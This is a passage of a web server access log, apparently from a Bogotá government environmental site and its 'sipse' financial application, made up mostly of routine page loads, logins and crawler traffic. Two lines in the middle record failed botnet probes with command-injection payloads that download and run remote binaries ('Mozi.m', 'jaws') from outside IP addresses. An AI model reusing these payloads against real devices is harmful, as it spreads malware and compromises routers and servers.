191.108.41.152 - - [05/May/2023:07:34:43 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.108.41.152 - - [05/May/2023:07:34:43 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.108.41.152 - - [05/May/2023:07:34:43 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.108.41.152 - - [05/May/2023:07:34:43 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.108.41.152 - - [05/May/2023:07:34:43 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 304 -
191.108.41.152 - - [05/May/2023:07:34:43 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.108.41.152 - - [05/May/2023:07:34:43 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 304 -
191.108.41.152 - - [05/May/2023:07:34:43 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 304 -
191.108.41.152 - - [05/May/2023:07:34:43 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
191.108.41.152 - - [05/May/2023:07:34:49 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 2223
191.108.41.152 - - [05/May/2023:07:34:50 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.108.41.152 - - [05/May/2023:07:34:51 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16354
191.108.41.152 - - [05/May/2023:07:34:51 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 304 -
191.108.41.152 - - [05/May/2023:07:34:51 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.108.41.152 - - [05/May/2023:07:34:51 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.108.41.152 - - [05/May/2023:07:34:51 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
191.108.41.152 - - [05/May/2023:07:34:51 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 304 -
191.108.41.152 - - [05/May/2023:07:34:51 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.108.41.152 - - [05/May/2023:07:34:51 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.108.41.152 - - [05/May/2023:07:34:51 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.108.41.152 - - [05/May/2023:07:34:51 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.108.41.152 - - [05/May/2023:07:34:51 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 304 -
191.108.41.152 - - [05/May/2023:07:34:51 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 304 -
191.108.41.152 - - [05/May/2023:07:34:51 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
191.108.41.152 - - [05/May/2023:07:34:53 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
191.108.41.152 - - [05/May/2023:07:34:53 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2658
191.108.41.152 - - [05/May/2023:07:34:53 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 64699
191.108.41.152 - - [05/May/2023:07:34:54 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.108.41.152 - - [05/May/2023:07:34:54 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.108.41.152 - - [05/May/2023:07:34:54 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
191.108.41.152 - - [05/May/2023:07:34:54 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.108.41.152 - - [05/May/2023:07:34:54 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.108.41.152 - - [05/May/2023:07:34:54 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.108.41.152 - - [05/May/2023:07:34:54 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.108.41.152 - - [05/May/2023:07:34:54 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1556
172.22.2.4 - - [05/May/2023:07:36:02 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [05/May/2023:07:37:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [05/May/2023:07:38:23 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/May/2023:07:36:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
217.182.175.162 - - [05/May/2023:07:38:34 -0500] "HEAD /el-proximo-13-de-mayo-participa-del-global-big-day.html HTTP/1.1" 200 -
66.249.70.168 - - [05/May/2023:07:39:08 -0500] "-" 408 -
173.252.107.118 - - [05/May/2023:07:39:09 -0500] "GET /images/1%20de%20febrero%20Humedal%20El%20Tunjo.jpeg HTTP/1.1" 200 52973
201.245.192.253 - - [05/May/2023:07:39:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42885
201.245.192.253 - - [05/May/2023:07:39:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43186
52.167.144.33 - - [05/May/2023:07:41:36 -0500] "GET / HTTP/1.1" 200 4720
186.29.180.89 - - [05/May/2023:07:42:32 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 468483
201.245.192.253 - - [05/May/2023:07:42:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [05/May/2023:07:43:22 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/May/2023:07:41:52 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/May/2023:07:42:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57561
191.156.150.34 - - [05/May/2023:07:44:45 -0500] "GET /el-proximo-13-de-mayo-participa-del-global-big-day.html?fbclid=IwAR0Bxd57leOfYrUkhXJjpRyIaMPsdpS29Qv3odIfKgWok9-_de_-gM56lBU HTTP/1.1" 200 736
201.245.192.253 - - [05/May/2023:07:47:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
34.90.171.93 - - [05/May/2023:07:48:12 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
216.245.221.92 - - [05/May/2023:07:48:22 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.84 - - [05/May/2023:07:48:28 -0500] "GET /dia-nacional-del-arbol-atributos-y-caracteristicas-de-las-especies-representativas-de-bogota.html HTTP/1.1" 304 -
172.22.2.4 - - [05/May/2023:07:47:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.86 - - [05/May/2023:07:49:52 -0500] "GET /autoliquidacion2020/index.php?dir=Grupo+Forestal+-+Silvicultura%2F HTTP/1.1" 200 2799
40.77.167.94 - - [05/May/2023:07:50:11 -0500] "GET /autoliquidacion2020/dlf/styles.css HTTP/1.1" 200 3045
172.22.2.4 - - [05/May/2023:07:48:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53561
163.116.226.114 - - [05/May/2023:07:50:46 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
163.116.226.114 - - [05/May/2023:07:50:46 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
163.116.226.114 - - [05/May/2023:07:50:46 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
122.194.11.79 - - [05/May/2023:07:51:51 -0500] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://102.33.98.14:45662/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 1019
201.245.192.253 - - [05/May/2023:07:52:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
181.204.149.250 - - [05/May/2023:07:53:01 -0500] "GET /el-proximo-13-de-mayo-participa-del-global-big-day.html HTTP/1.1" 200 736
113.59.187.167 - - [05/May/2023:07:53:08 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+45.81.243.34/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
216.245.221.92 - - [05/May/2023:07:53:22 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.84 - - [05/May/2023:07:53:48 -0500] "GET /ciudadana-recu HTTP/1.1" 404 1034
152.203.149.163 - - [05/May/2023:07:54:02 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
152.203.149.163 - - [05/May/2023:07:54:02 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:02 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12177
152.203.149.163 - - [05/May/2023:07:54:02 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:02 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:02 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:02 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:02 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:02 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:02 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:02 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:02 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:02 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:02 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:02 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:02 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:02 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
172.22.2.4 - - [05/May/2023:07:54:10 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
152.203.149.163 - - [05/May/2023:07:54:15 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16813
152.203.149.163 - - [05/May/2023:07:54:15 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:15 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:15 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:15 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:15 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:15 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:16 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:16 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:16 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:17 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:17 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:17 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
152.203.149.163 - - [05/May/2023:07:54:17 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:19 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:19 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 3255
152.203.149.163 - - [05/May/2023:07:54:19 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 184
152.203.149.163 - - [05/May/2023:07:54:19 -0500] "GET /sipse/faces/presentacion/financiero/solicitudAnulacion/solicitudAnulacion.xhtml HTTP/1.1" 200 31867
152.203.149.163 - - [05/May/2023:07:54:19 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:20 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/solicitudAnulacion.xhtml HTTP/1.1" 200 10464
152.203.149.163 - - [05/May/2023:07:54:22 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/solicitudAnulacion.xhtml HTTP/1.1" 200 36794
152.203.149.163 - - [05/May/2023:07:54:23 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:23 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:23 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:23 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:23 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:23 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:23 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:23 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1392
152.203.149.163 - - [05/May/2023:07:54:25 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:54:26 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 911
172.22.2.4 - - [05/May/2023:07:53:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
152.203.149.163 - - [05/May/2023:07:55:15 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
152.203.149.163 - - [05/May/2023:07:55:15 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:55:16 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12177
152.203.149.163 - - [05/May/2023:07:55:16 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:55:16 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:55:16 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:55:16 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:55:16 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:55:16 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:55:16 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:55:16 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:55:18 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 2221
152.203.149.163 - - [05/May/2023:07:55:18 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:55:19 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16360
152.203.149.163 - - [05/May/2023:07:55:19 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:55:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:55:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:55:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:55:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:55:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:55:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:55:19 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
152.203.149.163 - - [05/May/2023:07:55:21 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:55:21 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2658
152.203.149.163 - - [05/May/2023:07:55:22 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 63733
152.203.149.163 - - [05/May/2023:07:55:23 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:55:23 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:55:23 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:55:23 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:55:23 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:55:23 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:55:23 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.149.163 - - [05/May/2023:07:55:23 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1556
152.203.149.163 - - [05/May/2023:07:55:29 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 22913
172.22.2.4 - - [05/May/2023:07:54:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
172.22.2.4 - - [05/May/2023:07:56:37 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1334
172.22.2.4 - - [05/May/2023:07:56:37 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
152.203.149.163 - - [05/May/2023:07:56:57 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 45729
152.203.149.163 - - [05/May/2023:07:57:17 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 22882
201.245.192.253 - - [05/May/2023:07:57:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [05/May/2023:07:58:22 -0500] "HEAD / HTTP/1.1" 200 -
45.238.182.26 - - [05/May/2023:07:58:37 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
172.22.2.4 - - [05/May/2023:07:59:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/May/2023:08:00:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
201.245.192.253 - - [05/May/2023:08:02:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.70.172 - - [05/May/2023:08:03:21 -0500] "-" 408 -
216.245.221.92 - - [05/May/2023:08:03:22 -0500] "HEAD / HTTP/1.1" 200 -
190.24.64.133 - - [05/May/2023:08:04:44 -0500] "GET /mujeres-que-reverdec HTTP/1.1" 404 1136
190.24.64.133 - - [05/May/2023:08:04:45 -0500] "GET /favicon.ico HTTP/1.1" 404 1334
190.24.64.133 - - [05/May/2023:08:05:04 -0500] "GET /mujeres-que-reverdec HTTP/1.1" 404 1136
186.102.16.114 - - [05/May/2023:08:05:20 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX19qfWFD+l6+fkOi9bzm99KFoUjz+AQZ/ILlEvhXjq9DCONy0ylQYQpk&y=U2FsdGVkX19RtpKQbIgOxgfB/y2GM7TvSdN7EoFt7V6Lp8UisMUnrixakuax9sP4 HTTP/1.1" 200 30
186.102.16.114 - - [05/May/2023:08:05:20 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/d1QkuM2+3TmCQ3HncrM2QBvDaQ/vIA7p1Ra1VRSaUC9mpsZA8MHWvO387qEE+xihhM2B6F+qY5o9gYfWj0oOYug+23p1GCw0=&u=U2FsdGVkX18hTWG9B949E05yr/2gWluoY00KU826Bps=&y=U2FsdGVkX19RtpKQbIgOxgfB/y2GM7TvSdN7EoFt7V6Lp8UisMUnrixakuax9sP4 HTTP/1.1" 200 97
186.102.16.114 - - [05/May/2023:08:05:21 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18i491VmeX8kmzG2E0Nb7NMkFpjyXalY2zy1NRcz7Z5UfQPe6hGTPAXB1KTehLh2aNenJ7gfXG3vQkA69ICAsmSnF/e4KPW2fZf3g4LZaNbcro/HkMez5ylBa5+aqbpVANRlwNwD7A6RfA+FxKe9b28KoB9HHoOubk93AHcnNgtoGpPzI6f6tOBXr++QAsThWEC2jBxF5tDrtcQ/tBh1ZZWjjmtEoiYf49NXgOk0LM0OmThw9CzsRUUDFyMzz2NHEy5I5hnDuM1XePznW35ziPJRGRcHnCJPrkmSCNYRoiZyH/GUFgxeeiR8Nqn4ihcpV266q8vtQWpZIz8XIJdiXJ672vCTXK+0kKMRDdzz/MjYkBQhOdeECdCEpDgTh0DRqtB7jTKQFcOxNyZyx+3mfZU82qu+7DCiFsSfsu6GN+Qjpmtc+pBhJtpRqcSq6WdizHkvRaqiU9vJGOl9+u1mPedgBOAt3/fJFlKG/7cxLoBX39j+tm6WeqjBo/5otwbY+UW9Uzh9caRGm2UJRyXZSQhTEV+LaJo4iS0jPnD4TSzvKY8MtAO5A/ZIvOtY75BhET0xpdq0ByW1rzdFbuHV0F4mBs7l8LPdFwDXiZQi4EotgRFIu05IWEkxihZCC0Fj+xDRdBJM9KAXgSZ5CSdy6LWdijnr/6Xpmt6EbLrcFcL4GtMdu4T7qrr5gzoGJBXwljo3gzzPKaZuSLM6Z/F/tymQgIzl6MeQ/56r5zHeygXQtVAmjzbmlJtrqp18r4Z3agWHVoYSsqVikUVDo3ufmSaPM7UwH69gcH8VUsb2LywibrTFDPfi35pjxWHar/mXWP1N+rGUnlVEV3w6qJ/5Dz1nBsMA7SbyoEVy3rxjEmecydrrXqrMlUWDK+7y9lHlbz6zQzee7S2Om61siQTQBRI/DpxLCoyieF+ezn7oR84ktthRHCJIVSSsEpblk8TXkUIOpR2W+OM3L1g3zHzKKCasUNbIh0oDNWSY8zsrwUDPevXi5xl2LzS7kkYIPu+IkMtrG8C8Fqhd8Y1K8sSZ0/kPTtKTOlMg0lVETgmchrsON0K+9y00E+lWA3vXPu/Nl74yGx7+aFVf+tTfsVlxdE+oPoc90HolUgbAYEtKEEIRSTaUDvg8kPXDLNKa2XkYGpWFeZxVTPLkHyNGFUtEKl4vVb68VvXlIhth+BO6pdbGV8ZWhTKiI5M2TOjU4rzGJowe7BjQ0UDcP2BRKPjVTCMKkDVhIsQ9NQgTRFSYfx21ZzXGxeiK3iNtOsF47o2T/M8aBhZeHimwVNuz5kup50pPLW84aSnbDBBjUNXFr/KBcr1O0jKnb2wwHiyDJgVD2xmd4W2RQWAnfA4L4DaRlxnVVdX0AM16o/b2WiMaiJScGHD8XrbYLsCQAMdcjOQMopNlnij2GPsPSK2HsLTM0Yjfo7B5VImAb7nu0OU